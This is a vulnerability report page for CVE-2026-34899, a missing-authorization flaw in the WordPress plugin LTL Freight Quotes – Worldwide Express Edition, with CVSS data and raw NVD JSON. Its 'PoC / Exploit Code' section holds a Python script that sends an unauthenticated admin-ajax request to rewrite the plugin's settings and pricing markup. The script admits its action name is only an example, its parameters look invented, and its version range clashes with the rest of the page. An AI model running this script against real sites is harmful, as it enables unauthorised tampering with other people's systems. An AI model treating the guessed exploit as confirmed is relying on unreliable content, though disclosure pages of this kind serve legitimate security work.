Security Vulnerability Report
中文
CVE-2026-34899 CVSS 5.3 MEDIUM

CVE-2026-34899

Published: 2026-04-07 09:16:21
Last Modified: 2026-04-24 18:08:35

Description

Missing Authorization vulnerability in Eniture technology LTL Freight Quotes – Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LTL Freight Quotes – Worldwide Express Edition: from n/a through 5.2.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

LTL Freight Quotes – Worldwide Express Edition <= 5.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: LTL Freight Quotes < 5.2.1 - Missing Authorization PoC # CVE: CVE-2026-34899 def exploit_missing_authorization(target_url): """ This script demonstrates the missing authorization vulnerability. It attempts to trigger a sensitive action without authentication. """ # The vulnerable endpoint is typically admin-ajax.php ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Payload parameters (Example action name based on plugin structure) payload = { 'action': 'ltl_freight_quotes_save_settings', 'access_control_level': 'low_security', # Malicious configuration change 'quote_markup': '0' # Modifying pricing logic } try: response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if settings were modified.") print(f"[+] Response: {response.text[:100]}") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": target = "http://example-site.com" exploit_missing_authorization(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34899", "sourceIdentifier": "[email protected]", "published": "2026-04-07T09:16:21.340", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Eniture technology LTL Freight Quotes – Worldwide Express Edition allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LTL Freight Quotes – Worldwide Express Edition: from n/a through 5.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/ltl-freight-quotes-worldwide-express-edition/vulnerability/wordpress-ltl-freight-quotes-worldwide-express-edition-plugin-5-2-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}